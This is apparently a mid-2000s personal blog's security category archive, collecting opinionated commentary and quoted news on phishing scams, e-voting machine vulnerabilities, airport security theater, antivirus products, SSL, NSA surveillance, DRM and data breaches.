Recently in Security Category

I noticed that one of the throw-away email addresses I registered years ago for sony style product registration and accessories is now receiving spam.  Was sony compromised or did they have an insider sell their addresses?  Who knows...  I know that I didn't give it out to anyone...

This kind of thing was going on long before "phishing" was coined. It's the same thing in a different technology medium.

FOR IMMEDIATE RELEASE CONTACT: Scott Thomsen April 25, 2007 phone: 206/615-0978 pager: 206/386-4233

BILL COLLECTION SCAM TARGETS WEST SEATTLE
Customers Urged to Protect Credit Card Information from Con Artists

SEATTLE - Seattle City Light is urging its customers to be on guard against telephone con artists posing as utility bill collectors who appear to be targeting customers with Asian surnames in the West Seattle area.

In the past few days, several customers reported they received phone calls from people claiming to be City Light employees. One customer’s account was fraudulently tapped for more than $3,000.

In the scam, the callers claim there is a problem with payment of the customer's bill by check and demand credit card information to resolve the matter. This is similar to incidents reported to City Light in January and earlier this month.

Carol Dickinson, director of customer relations and account services, said City Light wants to help its customers protect themselves from such scams.

"We do not make outbound calls to customers asking for money to pay their bill or to ask for credit card payments or personal account information as part of our daily work," Dickinson said. "We respect customer privacy and take security of customer account and payment information seriously. We take many proactive steps to ensure that customer information is kept safe."

City Light sends at least two written warnings to customers who are about to have their power turned off, asking them to contact the utility directly to make a payment.

City Light also would like to remind customers:

• Seattle City Light never asks customers over the telephone for credit card information to pay their bills.


• Seattle City Light does not call customers on weekends.

Seattle City Light employees carry identification with the City Light logo and will always display it when asked.

All City Light customers are advised to take down the name and telephone number of anyone who calls and represents themselves as a City Light employee. Also, before customers provide any credit information, they should call City Light at 684-3000 to verify that the request is legitimate. If a customer believes he or she has been contacted by a con artist, they are urged to contact the Seattle Police Department at (206) 625-5011 to report the incident.

Boing Boing: Craigslist hoax ad leads to destroyed home

This happened in Washington. I couldn't believe it when I heard about it and now it's made it to Boing Boing. Scary.

The National Institute of Standards and Technology (NIST) recently published a paper condemning paperless electronic voting machines as insecurable.  I'll have to read the paper in-depth to see how they came to that strong of a conclusion, but I do know that there is no research showing that a purely electronic system can be completely trustworthy.

It's amazing how far this subject has come in just a few years, yet how far it still needs to go as evidenced by the irregularities in the recent 2006 midterm election.

Slashdot | NIST Condemns Paperless Electronic Voting

It's not really a typo but an intentionally left-out X separator for
aesthetics on the sculpture that was intended to result in gibberish
when decrypted that would clue in the decryptors to reinsert a separator
and try again, except it ended up spelling something intelligible
instead of garbage so they thought they had decrypted it properly!

For nearly 16 years, puzzle enthusiasts have labored to decipher an 865-character coded message stenciled into a sculpture on the grounds of the Central Intelligence Agency's headquarters in Langley, Va. This week, the sculptor gave them an unsettling but hopeful surprise: part of the message they thought they had deciphered years ago actually says something else.

A study from a year ago but just as valid today.  Actually, over the past year, IE got much worse.  There were many exploits and unpatched holes in the browser.

One of the best things you can do for your Windows security is to make sure you upgrade to IE 7.x which has been redesigned to avoid many classes of attacks.  It is being pushed out by Windows Update (or Microsoft Update)  You can also switch to Firefox or Opera to get better security but please don't use IE 6.x or older anymore! 

Unfortunately, you have to be on Windows XP SP2 or higher to use IE 7.  So, it will force Windows 2000 users to upgrade to XP first.  That is probably also a good thing for security though.

Schneier on Security: Internet Explorer Sucks

Get this:  The list of top terrorist targets from the Department of Homeland Security is seriously braindead.  It includes 1,305 casinos, 234 restaurants, an ice cream parlor, a tackle shop, a flea market, and an Amish popcorn factory  3,650 sites total.  What's going on?  Pork-barrel politics is what's going on.  We're never going to get security right if we continue to make it a parody of itself.

The worst part is that DHS didn't even try to hide the pork-barreling by making the inclusions and omissions clear and blatant.  Oy.  I reluctantly file this in the security category...

The Seattle Times: Local News: Dept. of Homeland Lunacy

When it comes to homeland security, I give up.

I've tried to highlight the absurdity of trying to protect every cranny of our country from al-Qaida attack. I've critiqued everything from the waste of buying anti-terrorist locks for Sammamish City Hall to the illogic of not having security cameras outside our airport. And yes, I've resorted to that columnist stock-in-trade: mocking and satirizing.

But it turns out nothing I can make up is as ludicrous as what the Department of Homeland Security is actually doing.

Here's a description of how to open a common Master brand lock in about 10 minutes.  The design makes the 40^3 possible combinations collapse to 121.  It's a physical metaphor for bad cryptography and reliance on obscurity.

I happen to have a lock that I forgot the combo to that this will definitely come in handy for...if I can only find the lock...

This was the most troubling one:

Airport Security Oversights | The Onion - America's Finest News Source

Sept. 3, London to New York: A few Muslim people may have slipped through with their dignity

U.S. Cryptographers: 'FrpX-K5jE-Oc4n-e5Dn' | The Onion - America's Finest News Source

WASHINGTON, DC—In a carefully phrased, 128-bit encoded announcement that has challenged U.S. security agency procedures, top officials of the National Cryptography and Information Security Council warned that "FrpX-K5jE-Oc4n-e5Dn" if "Ha4d-87gH-uiH3-gB5r-g8Bh" late Monday.

This is an article from a year ago that showed how each vendor was able to respond to key virus outbreaks.  They also show the data from the previous year.

I personally recommend F-Secure's product.  The base product gives you everything you need for anti-spyware and malware and is inexpensive.  It is not a huge fat pig like some of the products out there (McAfee...)  I've heard from others who enjoy Kapersky as well, so either of those would be good choices and happen to both top this list.

I also personally got rid of McAfee products after a multitude of issues:

1. The product is seriously bloated and the Security Center product seems geard toward selling other products by McAfee than providing normal users with value.
2. Many of the products in the suite are not well integrated.  They often had their own installers and were a real pain to uninstall.
3. Lots of errors resulting in having to reinstall the product (without there being an easy way to do so).
4. Their website security is horrendous.  My wife forgot her password to their site so she used their "forgot my password" feature.  Guess what?  They emailed her, not a new random password, but her _actual password_  This from a security company!  They either store passwords without encryption or store them with reversible encryption--both of which are seriously bad ideas and McAfee should know better.
5. Their suite product line is very expensive and the price seems to go up every year.  They have since reworked their product line and it seems to be better now.
6. I read the F-Secure blog and can tell those guys really get security.
7. McAfee was the company with the poor QA that removed critical Office files to "protect" you and also mislabeled a legitmate ISP software program
8. McAfee products, like Symantec, have suffered from some local privilege escalation vulnerabilities or remote buffer overflows.  The cure is worse than the disease?

Ranking Response Times for Anti-Virus Programs - Security Fix

I would add a 5th item:

5. Develop Reusable Security Architectures that cover common scenarios and include appropriate protection by design

Tools are sexy; secure design is hard.  That's why you see so many tools and vendors hawking tools but not as much work.  I hear from people all the time who talk about this tool or pen testing or scanning some server or how you need to hack your wireless network to be secure.  That is a bunch of crap in general because trying to audit your way to security is bottom-up grass-roots and can only get you so far.  It's an early maturity model to be spending so much time and energy on audits and pen tests instead of security design reviews and developing security architectures.  It's a lot easier and sexier to say you hacked a wireless network.  We need to get to where it is just as cool to say you developed a wireless network security architecture such that you don't care who is connected to the wireless network because your security is not so brittle as to lose sleep over it.  Where are those reusable models made open source?

As for item #3, I don't think that I believe that there can be "quantitative" security risk management.  The biggest problem is that there is not enough good data to base future risk upon (try this:  how do you quantify risk of brand damage due to event X?). 

Item #4 is very important and speaks to ensuring security systems are usable.

CRA (Computing Research Association) Grand Research Challenges

Four Grand Challenges in Trustworthy Computing:

1. Eliminate epidemic-style attacks (viruses, worms, email spam) within 10 years;
2. Develop tools and principles that allow construction of large-scale systems for important societal applications -- such as medical records systems -- that are highly trustworthy despite being attractive targets;
3. Develop quantitative information-systems risk management to be at least as good as quantitative financial risk management within the next decade;
4. Give end-users security controls they can understand and privacy they can control for the dynamic, pervasive computing environments of the future.

It is hard to believe that such a blatant undervote error could be attributable solely to the DRE itself not properly recording them.  But user interface designs can certainly be abused maliciously, or likely unintentionally, to create these situations.  How ironic is it that the DREs that were touted to Help America Vote are actually helping them to undervote, due to poor design/implementation of the ballots?

Proper UI is just as important as sound underlying technology in ensuring proper understanding and usability of a system.  Recall Why Can't Johnny Encrypt?  A Usability Evaluation of PGP 5.0 and the more recent Why Johnny Still Can't Encrypt:  Evaluating the Usability of Email Encryption Software for how even known secure software can result in insecure  and unintended actions by the user.  The infamous Butterfly ballots were not DRE-based but certainly were flawed UI that caused voting errors in previous elections so this is not a new issue to software or to voting by far.

This is a perfect example though of how using DREs to generate human-and-machine-readable reciepts (voter verifiable) could allow for voters to detect their undervotes before they drop them into the ballot box.  There could even be very blatant warnings to the user on the receipt and on the screen that they didn't vote in X of the races to help prevent unintentional undervotes.  Did these companies do any focus group testing of DREs?

FL-13: More Evidence of Ballot Design Issues - TalkLeft: The Politics Of Crime

...Bev Harris and the Jennings campaign want you to think otherwise. They want to point away from their mistakes. But the real problem was the design...

Aviv Raff On .NET - VML Exploit vs. AV/IPS/IDS signatures

Article showing how VirusTotal revealed how easy it can be to create "variants" that go undetected by most Anti Virus products. The VirustTotal website could be a valuable resource.

Freakonomics Blog: An airplane announcement I’ve been waiting for

if I were a terrorist, don’t you think that I could figure out how to take the top off a bottle of contact lens solution and put my explosive liquids in there? It is totally pointless to enforce rules which impose costs on innocent people, but are easily circumvented by terrorists. Can anyone think this is accomplishing anything productive?

The BRAD BLOG : HACKED: VIRUS IMPLANTED, SPREAD ON DIEBOLD TOUCH-SCREEN VOTING MACHINE!

Researchers at Princeton, including Ed Felton, have been able to implant malicious code on Diebold touch screen voting machines that was demonstrated to be able to flip election results. They have a video of them doing this as well.

The company response is typically clueless (as is their security). I wonder if the nice Diebold ATMs in use at banks such as USBank are anywhere near as vulnerable?

The Open Voting Foundation

“This may be the worst security flaw we have seen in touch screen voting machines,” says Open Voting Foundation president, Alan Dechert. Upon examining the inner workings of one of the most popular paperless touch screen voting machines used in public elections in the United States, it has been determined that with the flip of a single switch inside, the machine can behave in a completely different manner compared to the tested and certified version.

Makes you wonder how secure those ATMs made by Diebold are (USBank uses them I know).

Schneier on Security: Hacked MySpace Server Infects a Million Computers with Malware

Malicious banner ad exploits unpatched IE hole (there are many and more all the time). You have switched to Firefox, Opera, Konqueror or anything other than IE, right?

SeaSec security forum

Just found out about an informal security group that meets in Seattle. I've often seen a need for interaction with security professionals between Agora and ISSA monthly meetings (and I'm on the ISSA Puget Sound board). Where organizations don't meet needs, they often spring up on their own. Once my dance lessons are over at Century Ballroom, I'll be able to attend these on Wednesdays.

Why
Agora and ISSA are too formal. This is just a chance to hang out with local security professionals and get to know each other.

SSL-authenticated login pages certainly doesn't _solve_ the phishing problem since phishing is partly psychological/sociological and makes use of technology as a means of improving the odds of the hacking the human psyche. So, a purely technological fix is unlikely to, prima facia, address the root issues.

But, the SSL change can help in a couple of key ways:

1. Rather than give customers 0 tools to protect themselves, we can give them at least the best tool out there so far for authenticating our site and therefore make an informed decision.
2. . Rather than continuing to train users to "trust page contents" (i.e. the lock image and our feeble assurances in the "Why this is secure" page), we can retrain them to use reliable measures that are not as subject to spoofing.

That is not to say that SSL does not have its problems:

1. Who made the trust decision to put the 50-100 CA certs in the browser? Why should the user trust those introducers? How do we know that those issuers won't screw up (like Equifax/GeoTrust did recently by issuing a domain-verified cert automatically that was very similar to a real bank: http://jordy.gundy.org/?p=49)
2. The UI is horrible for security. The lock is too small, it is too easy for the "simon says" problem to bite you since you don't notice when it isn't there. Some changes, such as changing the browser toolbar color based on the encryption will help, but Firefox and IE7 use different color schemes for the same semantics...
3. There are usability issues with the UI. Everybody (even me) turns off the warning dialogs about submitting unencrypted form posts. That kind of annoy-user-into-submission security fails the psychological acceptability test and it doesn't work anyhow because you should generally protect the user where it counts, not warn and hope they do the right thing.
4. The phishing problem is one of Identity Continuity. It's not important that an SSL certificate matches the domain, since that does not help during the initial introduction to a site. What you really should be protecting the users from is when a known relationship in the digital sense has a discontinuity. That signals a phishing attack. The analogy is SSH known_hosts. On the initial introduction, you choose to trust the server since the likelihood that you are being MITM attacked is infinitesimal. But, if you are MITM attacked, SSH will scream loudly and not let you connect. That is what the browsers should do, although clean up the UI a bit for the unwashed masses. The MITM issue is one of a discontinuity. So, SSL in the current sense solves the wrong problem because the browsers have no means of managing site continuity information. They should. Some schemes, such as trustbar and petnames, allow friendly site logos or names to help users detect continuity problems, but their UIs are too easy to ignore if there is a problem. The user should actually be stopped from proceeding.

AJAX security is no different than normal web application security, except that it can add lots of complexity to a site and make black-box auditing much more difficult.

-----Original Message----- From: Andrew van der Stock [mailto:vanderaj@greebo.net] Sent: Tuesday, June 20, 2006 4:43 AM To: Webappsec ((((E-mail)))) Subject: Fwd: SF new article announcement: Ajax security basics

This was posted to SecurityFocus.com yesterday.

Their article is eerily similar to my Ajax presentation from February
(particularly if you've seen me give the presentation), and even more
similar to the draft Ajax chapter I wrote shortly after for the OWASP
Guide (now posted to our Wiki - http://www.owasp.org/index.php/
Ajax_and_Other_%22Rich%22_Interface_Technologies). Hmmmm. As the saying
goes, this is the best form of flattery. I suppose.

If you haven't had a chance to read up on Ajax security, their article
is a start... as is my presentation (http://www.greebo.net/?
page_id=329) and the draft chapter in the OWASP Guide 3.0 current.

thanks,
Andrew

Begin forwarded message:

> > Ajax security basics
> > By Jaswinder S. Hayre, and Jayasankar Kelath
> > 2006-06-19
> >
> > The purpose of this article is to introduce some of the security
> > implications with modern Ajax web technologies. Though Ajax
> > applications can be more difficult to test, security professionals
> > already have most of relevant approaches and tools needed.
> >
> > http://www.securityfocus.com/infocus/1868

OWASP is pleased to announce the immediate availability of the OWASP PHP Top 5. The OWASP Top 5 is an education piece which provides up to date advice to PHP developers, hosters, and other PHP users. The PHP Top 5 is produced by the OWASP PHP Project.

The PHP Top 5 is based upon attack frequency in 2005 as reported to
Bugtraq. This information is a valuable insight into the most
devastating attacks against the world's most popular web application
framework.

In 2005, OWASP collaborated with SANS to research and write a completely
new PHP section for their successful SANS Top 20 2005. The OWASP PHP Top
5 is the full unabridged text, updated to reflect recent XSS attacks and
SQL injection vectors.

OWASP PHP Top 5

http://www.owasp.org/index.php/PHP_Top_5

OWASP PHP Project

http://www.owasp.org/index.php/Category:OWASP_PHP_Project

A Dangerous Loophole in Airport Security - If Slate could discover it, the terrorists will too. By Andy Bowers

More security window-dressing... More reason that ID checks and the watch list are BS security.

[IP] Govt Comp.News - Assessing "cyberterror" - couldn't find any!

>I've been working on the issue of how to build secure public networks >for about 7 years. I started out as a military analyst and I wanted to >put the cyber terror/cyber war issue in a larger strategic context. >About a year ago, I started looking for examples of cyber-terrorism, >where hackers had shut down critical infrastuctures. I was surprised to >discover that I couldn't find any, so I began to look more closely at >the hypothetical scenarios involving cyber war. Most of them turned out >to be implausible from a military or national security perspective. >Hence the report.

[infowarrior] - Microsoft sponsors security career guide Richard Forno Fri, 08 Jul 2005 22:39:04 -0700

Microsoft sponsors security career guide
http://news.com.com/2060-10789_3-0.html?tag=nefd.bl

A nonprofit organization with help from Microsoft has created a "career
guide" to spark interest for the information security profession among high
school and college students.

The guide was distributed last month to more than 3,500 school counselors,
administrators and educators at education conferences and has been made
available online, the International Information Systems Security
Certification Consortium, or (ISC)2, said this week.

Microsoft sponsored the 35-page guide, which is titled "Decoding the
Information Security Profession." The booklet offers a description of
information security, typical jobs, titles, industries and organizations,
professional requirements, certification options, typical salaries, career
outlook, and a listing of schools, education facilities, certification
companies and other resources and associations.

The guide can be found at:
https://www.isc2.org/careerguide/

PKI considered harmful

Next time someone at your company says "we can't do encryption until we get a PKI", refer to this essay and collection of references.

I'll need to put together a related one to address the "we can't do ecnryption until we get a "key management" solution".

SSH Filesystem

This is a filesystem client based on the SSH File Transfer Protocol. Since most SSH servers already support this protocol it is very easy to set up: i.e. on the server side there's nothing to do. On the client side mounting the filesystem is as easy as logging into the server with ssh.

Something to investigate...

Western Union blocks Arab cash deliveries - Yahoo! News

DUBAI, United Arab Emirates - Money transfer agencies have delayed or blocked thousands of cash deliveries on suspicion of terrorist connections simply because senders or recipients have names like Mohammed or Ahmed, company officials said. ADVERTISEMENT

In one example, an Indian driver here said Western Union prevented him from sending $120 to a friend at home last month because the recipient's name was Mohammed.

Hard to believe it could be possible, but this is more stupid than the TSA's Secure Flight program (also a miserable failure).

cryocone: Identity leak with Sprint wireless

Someone in their infinite wisdom at Sprint set up an IVR that you can call (intended for internal care reps for identity verification) and get anyone's CPNI/PII by simply keying in their sprint wireless phone number.

Really convenient for Sprint employees and the public -- and really stupid on all counts.

Time to switch your phone company. AT&T rewrote its privacy policy to basically say that your data is theirs and they will do what they please. Some legal manoevering to allow them to continue to sell those records to the NSA to spy on you. All Cingular customers should now be wary since AT&T will own them once the acquisition is complete.

But I guess, what do you expect when we live in a country that doesn't explicitly grant privacy protections like the EU and where privacy is routinely tromped on by companies and the government for their own ends? And when the US public has been trained that this is okay?

http://www.networkingpipeline.com/showArticle.jhtml?articleID=189600470

The most disturbing revelation was one on June 30, 2006 when it was revealed that the NSA allegedly Sought U.S. Call Records 7 Months Before 9/11 This is a perfect example of the danger of unchecked governmental power and unrestrained trust in governement to not abuse power given them or taken (as in the Bush Administration).

NPR 12-5-2002, All things considered 4pm.

"businesses are so interested in extending credit..." they just write off the losses. ID theft has not hit businesses economically yet, since that cost is borne by the victims, so they don't have incentive to do anything to fix these problems. And yet, the disclosure laws have given incentive to fix these problems but they seem to instead be incenting companies to water down the proposed federal legislation to neuter the positive effects they are having at creating a market economic incentive to fix the problems (though from the myriad reports still coming out every week about more data lost, you wonder what the heck some CISOs are doing).

Also, this story discusses a report that most ID theft is done by insiders. You do include insider attacks in your threat models, don't you? Kill the fortress mentality!

SecurityFocus HOME Columnists: Iraqi Cyberwar: an Ageless Joke

This is an OLD story so I hope that it is dead by now. But perfect example of the lack of fact-checking that goes on so much in the media.

Passionate condemnation of the music industry:

[IP] MUST READ Courtney Love does the math The controversial singertak

[IP] last on this topic -- Does File Trading Fund Terrorism? Successful artists not seeing any profit.

http://www.marketplace.org/play/audio.php?media=/2003/03/12_mpp&start=00:00: 20:00.0&end=00:00:27:30.0

[IP] 2 more on Does File Trading Fund Terrorism?

And to round this out, a great interview with John Perry Barlow on the evils of Digital Restriction Management Wrapped up in Crypto Bottles

And to draw in a security angle to all of this:

Security Blog

Sony rootkit debacle highlights the failure of the security technology industry: The real story, as Bruce Schneier points out - why the hell didn't any Antivirus software (or IDS for that matter), detect this software sooner? Is corporate malware going to continue to be default allow by these products? We are collectively paying these companies billions of dollars for what?

[IP] I will start using my Visa card more

Wow this blog entry is old. But remember when every receipt had the full card number on it? And remember when Starbucks would mask out everything _except_ the last four digits so that you could get the full card number with just two receipts?

I still find that the business' copy of the receipts often has the full card number on it, with only my copy being masked out. But, I don't much care, except when it comes to my Debit card receipts since the US laws do not cover Debit cards as fully as credit cards.

Wired 14.05: The RFID Hacking Underground

Follow-along to the article on building your own RFID skimmer

The other day, I made what I think is a very apt analogy comparing the security product industry to the diet and herbal supplement industry.

• Both operate with little to no oversight or regulation (though security at least has bloggers and scientists willing to call out some of the more egregious offenders)
• Products often have little to no academic, scientific or factual basis for their designs or claims
• Products tend toward the panacea/"silver bullet" realm and claim to solve all your ills

I'm sure that I am missing some more...

Cracking Java byte-code encryption

Why Java obfuscation schemes based on byte-code encryption won't work.

A gaggle of links about the illegal NSA domestic spying program. More apropos in light of even more spying by the Bush Administration -- this time on international wire transfers

Think Progress: NSA Whistleblower To Expose More Unlawful Activity: ‘People…Are Going To Be Shocked’

Media Matters - Myths and falsehoods on the NSA domestic call-tracking program

Illegal NSA Data Mining Highlights Need for Congressional Oversight CDT legal analysis (Center for Democracy and Technology) of the NSA spying program

And some analysis of how this kind of program is ineffective (My favorite description is that finding a needle in a haystack is not made easier by increasing the size of the haystack)

Daily Kos: The NSA, the Database and YOU

Daily Kos: An Illusion of Privacy and Security

PayPal - Identity Protection Resources

It was a very good touch that PayPal even uses HTTPS (SSL) for their pages providing this security information so that end users can authenticate the pages originate from PayPal and get used to ensuring that their interactions with PayPal are SSL-secured.

Plugging my own product, but what the hell, it is open source :)

AppArmor http://opensuse.org/Apparmor is an application security container technology for Linux. It lets you create application profiles
(policies) that define the files that the application can read, write, and execute. It lets you do this per-application, so you actually could allow users to upload arbitrary C/binary programs and expect them to behave as you specified. It provides an inheritance model so that you can't escape from this jail by exec'ing something fun: the child is controlled by policy too.

And for confining PHP (and PERL code run by mod_perl, and any other language interpreted in-place by Apache) AppArmor provides a change_hat API call and a mod_apparmor module for Apache, so that you can have AppArmor-style profiles wrapped around individual PHP pages and mod_perl scripts, even though they never appear in the process table.

If you find yourself between the rock of having to run some PHP or PERL code and a hard place of not trusting that code, try confining it with AppArmor, so that if/when the code screws up, it can only screw itself.

Crispin

--
Crispin Cowan, Ph.D. http://crispincowan.com/~crispin/
Director of Software Engineering, Novell http://novell.com

How to Build a Low-Cost, Extended-Range RFID Skimmer

Oh, I'm definitely going to have to build one of these!!

ZDNetAsia : Printer Friendly - Paypal fixes phishing hole

(19 June 2006)
Letters are being sent to 13,000 individuals whose personal data are held in a laptop computer stolen from the home of an ING US Financial Services agent. ING is instating a new security policy for laptop computers that includes encryption and password protection; the stolen computer had neither. The people affected by the data security breach are all District workers and retirees.
(please note: this site requires free registration) http://www.washingtonpost.com/wp-dyn/content/article/2006/06/18/AR2006061800716_pf.html
[Editor's Note ( Northcutt): ING's slogan is Your Future. Made Easier.
Try telling that to the 13,000 impacted individuals. This wave of data losses is starting to remind me of counties that don't put traffic lights up until there is a motorist fatality.
(Grefer): Invest around 30-40 dollars into a cable lock for your laptop computers and spare yourselves this embarrassment as well as lots of headaches for your customers. Further, even if you don't want to spend the money for encryption software, at least use the EFS (Encrypted File
System) functionality provided within Windows XP Professional to add a bit more security to the mix.]

27B Stroke 6

Bizarre notepad bug that really exists. If you type a phrase consisting of a 4 letter word, then two three letter words, then a 5 letter word, save it, then reopen it, the text will be corrupted and unreadable. There is a claim that not all words cause this to occur. See the linked story for examples of what does work.

There was a great quote:

If Microsoft can't keep strange bugs out of Windows' simplest application, we'd better get used to the monthly security patch cycle.

************************************************************************* SANS NewsBites April 25, 2006 Vol. 8, Num. 33 ************************************************************************* -- snip -- --Researcher Warns Some Online Banking Sites Don't Provide Adequate Authentication (20 April 2006) SANS Institute chief research officer Johannes Ullrich says many widely used online banking sites do not use authentication technology to assure that they are who they claim to be. Banks would be well advised to send users to an HTTP Secure (HTTPS) web page which uses the Secure Sockets layer (SSL) security protocol instead of merely encrypting login forms. Web pages that do not use HTTPS make themselves vulnerable to DNS spoofing in which attackers try to trick users into visiting phony web sites in an attempt to gather their account information. http://www.computerworld.com/printthis/2006/0,4814,110738,00.html Internet Storm Center: http://isc.sans.org/diary.php?storyid=1278 -- snip --

[Editor's Note (Axley): This is pure silliness. Their "head researcher" only now has discovered that this has been going on? I certainly applaud their efforts to raise awareness of the issue and clarify it as an authentication issue, not an encryption one, albeit late to the game, and will likely contribute my list to their list of financial institutions not authenticating their login pages (which are often on their homepages) with SSL. I had to deal with this issue at AT&T Wireless with their homepage and also am dealing with it as we speak at my present employer so it is not new. Many companies seem content these past few years to be "cream of the crap" instead of "cream of the crop" -- only striving to be "as good as" (read: "as bad as") the next guy. My prediction is that it won't stay this way since phishing is getting solidified as its own industry now. ]

--Microsoft to End Support for "Outdated" Operating Systems (18 April 2006) Microsoft plans to retire support for Windows 98, Windows 98 SE and Windows ME on July 11, 2006; after that date, there will be no more security updates for these versions of the company's operating systems. Microsoft calls these systems "outdated" and recommends that users upgrade to a more secure operating system, such as Windows XP. http://searchsecurity.techtarget.com/originalContent/0,289142,sid14_gci1182527,00.html

http://thomas.loc.gov/cgi-bin/query/z?c109:H.R.3997:

Call your representatives now to get them to oppose this legislation. This is the bill that passed out of committee and would seriously weaken the gains that have been made over the past few years in data breach notification, as well as preventing people from preemptively "freezing" their credit file from being used to open new accounts--something that itself could curb much of the ID theft problems (and perhaps some consumer credit problems...)

It is such BS that Republicans are all about state's rights...except in this case...and that case...and this other case... Hypocrites!

http://www.microsoft.com/downloads/details.aspx?familyid=eae20f0f-c41c-44fe-84ce-1df707d7a2e9&displaylang=en

This update starts the driver secdrv for SafeDisc from Macrovision at boot time to allow you to run games as a non-admin, lower-privilege user. Games that use SafeDisc otherwise require you to play the game as Administrator in order to have the rights to start the Manual service. Now, if only PunkBuster were to do the same...

Have I mentioned that DRM and copy protection sucks?

Boing Boing: Encrypted VOIP from PGP creator Zimmermann: Zfone

Encrypted VOIP from PGP creator Zimmermann: Zfone

Good reason to switch to VOIP instead of traditional phones to protect yourself from Big Brother Bush.

Freedom to Tinker � Blog Archive � RIAA Says Future DRM Might “Threaten Critical Infrastructure and Potentially Endanger Lives”

Yet another reason DRM sucks. But unbelievably, the "BSA, RIAA, MPAA, and friends" actually are objecting to DRM exemptions for critical systems!

I was also reading recently about how much extra processor and battery life is sucked up when playing DRM files that have to constantly be checking for a valid license and other cruft.

DHS Gets Another F in Computer Security

Is anyone surprised? They can't even manage a disaster in the physical world (Katrina), what makes you think they can manage the disaster that DHS is? Another black mark for Chertoff and the Bush administration.

Why does the public still think that the Bush administration is strong on defending America?

Most federal agencies that play key roles in the war on terror are doing a dismal job of protecting their computers and information networks from hackers and viruses, according to portions of a report to be released by a key congressional oversight committee Thursday.

The Department of Homeland Security, which is charged with setting the government's cyber security agenda, earned a grade of F for the third straight year from the House Government Reform Committee. Other agencies whose failing marks went unchanged from 2004 include the departments of Agriculture, Defense, Energy, State, Health and Human Services, Transportation, and Veterans Affairs.

Well, at least they're committed to national security consistent conservative... I give up.

"The same Bush administration review panel that approved a ports deal involving the United Arab Emirates has notified a leading Israeli software company that it faces a rare, full-blown investigation over its plans to buy a smaller rival.

The objections by the FBI and Pentagon were partly over specialized
intrusion detection software known as "Snort," which guards some
classified U.S. military and intelligence computers."

http://redmondmag.com/news/article.asp?editorialsid=7219

Crimeware coverage by Scientific American

Crimeware coverage by Scientific American. Several good stats and comments from attendees of the RSA Conference. Why the increase in crime on the Internet? Well, it's where the money is and there is very little risk of getting caught. Job security for a security guy like me though.

IDP : Investigation

Help us help you determine whether the TSA told the 9th Circuit the truth. Can you fly without ID? According to what the government told the 9th Circuit Court of Appeals in the Gilmore case, you can – you need only submit to secondary screening in order to fly anonymously.

I am just reading a Lee Child book from 1999 (pre 9/11) where the main character flew under president's names. Would be fun if you could get away with this. Might try it on my next flight...

I almost laughed when I went to the Westin building in Seattle and the guard was going to let me in but I had to show him my ID to get a badge, presumably. But it was funny that someone who worked in the building that I was coming to see happened to come by at the same time and was able to take me in without showing ID or getting a badge. Go figure. So, how important for security _is_ showing an ID then? And, if your threat model includes suicide bombers, what does an ID buy you in terms of protection?

If your employer or corrupt, undemocratic, dictator-based government uses a filtering service such as Secure Computing's SmartFilter to block access to BoingBoing.net, you can try the following workarounds...

Boing Boing's Guide to Defeating Censorware

Of course, good network admins take evasive action for these evasive actions, but the reality is that there are always ways to get around proxies. Especially when they do stupid shit like "Smart" filter does. Smartfilter will often block an entire domain in a category for one single page that may fit in that category. They blocked attrition.org under "criminal skills" and several other security sites. I recall them blocking geocities.com or something like it when only some of the pages met the criteria. Why don't they block specific URLs or URL patterns instead of an entire domain?

The Torn-Up Credit Card Application

They tore up their own credit card application, then changed the address and phone number and still got the card!

I always shred the applications I get in the mail.

And the good thing is that in Seattle, you can either recycle your shreddings or put them in your yard waste container.

Australian IT - Oracle on track of secure search (, MARCH 07, 2006)

"We have the security problem solved. That's what we're good at, and that's the hard part of the problem." -- Larry Ellison

Hell has not frozen over so I don't believe him.

Black Box Voting : 2-23-06: Someone accessed 40 Palm Beach County voting machines Nov 2004

This is good work. NOW do the naysayers see why we need voter verifiable paper ballots?

On The McLaughlin Group yesterday, there was a lot of ridiculous sophistry regarding racial profiling as a valuable and necessary tradeoff between liberty and security.

Bruce Schneier has written many times on this subject. In this piece, there is a perfect quote about what is misguided about the position that racial profiling is not only necessary, but is actually effective, "Whenever you design a security system with two ways through -- an easy way and a hard way -- you invite the attacker to take the easy way. Profile for young Arab males, and you'll get terrorists that are old non-Arab females."

"The enemy could easily get around it by recruiting people who don't look like the profile" -- Eleanor Clift, the only one who gets it.

"We need smart profiling, not racial profiling" -- John McLaughlin, who also gets it, sort of. He was pushing for profiling Muslims, which I don't believe source the only terrorists now, in the past, or in the future. He is right about one thing, religion has been the excuse for all kinds of atrocities all over the world. But it has not been limited to Muslim extremists. There are Christian extremists even in our own country who would love to turn this country into a theocracy.

Best new word: "Muslometer"; a call for venture capitalists to develop a device to gauge whether someone is a Muslim or not.

When people tried to evacuate during Hurricane Katrina, airline security prevented many from being able to leave before the airport had to be shut down. This is where a threat model would have helped make the right decision in the face of competing risks. And where "zero tolerance" policies really show how they are "zero thought" policies.

Hurricane Security and Airline Security Collide

And recently, if you thought that airline security was too strict, it is working. You should know it is only designed to make you _think_ that so that you will keep flying. If they really based it on a real threat model, you would have a very different traveling experience and stupid things like taking fingernail clippers and metal knives away, but allowing you to have full glass bottles of alcohol on planes would not happen. My cousin, who was in the army, recently said, "I'd like a terrorist to try to attack me with fingernail clippers." The implication was that he would kick their ass to a bloody pulp before they got anywhere because that is stupidity masquerading as a threat to airline security.

Here is what happens when a politician says The Emperor Has No Clothes. Good for him to speak the truth. The homeland security budget could be put to use protecting against real threats.

Real threats like the fact that our air traffic control systems have shitty security. It is so bad, they lack cyber security. Oooh.
FAA air-traffic systems lack cyberprotections, GAO finds

LiveAmmo Security Blog: Drunk drivers granted access to breathalyser source code

If only I was able to be granted the source code for the laser detector that incorrectly clocked me over the speed limit...

I like when judges don't treat technology as infallible. In my case, there was not any argument that could detract from the "evidence" , even the likely EMI!

Oh, and let's also demand the same for our voting machines!

"A panel of judges in the Florida county of Sarasota has granted a request by a group of over 150 citizens accused of drink-driving to view the source code of the breathalyser that was used to determine their breath alcohol levels.

Attorneys for the defendants had filed a motion to review the source code for the Intoxilyzer 5000 breathalyzer in October.

'The defendants have established that the source code is material to their theory of defense in these cases,' judges David Denkin, Kimberly Bonner and Judy Goldman wrote in their ruling dated 2 November.

This link wasn't working at the time of posting, but it is interesting to see how you can use infrared to determine a combination from a recently-used keypad. There must be some equipment that would cost less than $5000 that could do this? I'll have to check the local spy shop.

http://lcamtuf.coredump.cx/tsafe/

GNU project founder foils UN security

Glad my passport does not expire for many years to come. Perhaps by then passports won't have RFID tags in them any longer. But if they do, I guess this is an easy way to keep myself from being a target for a shoulder-fired missile overseas.

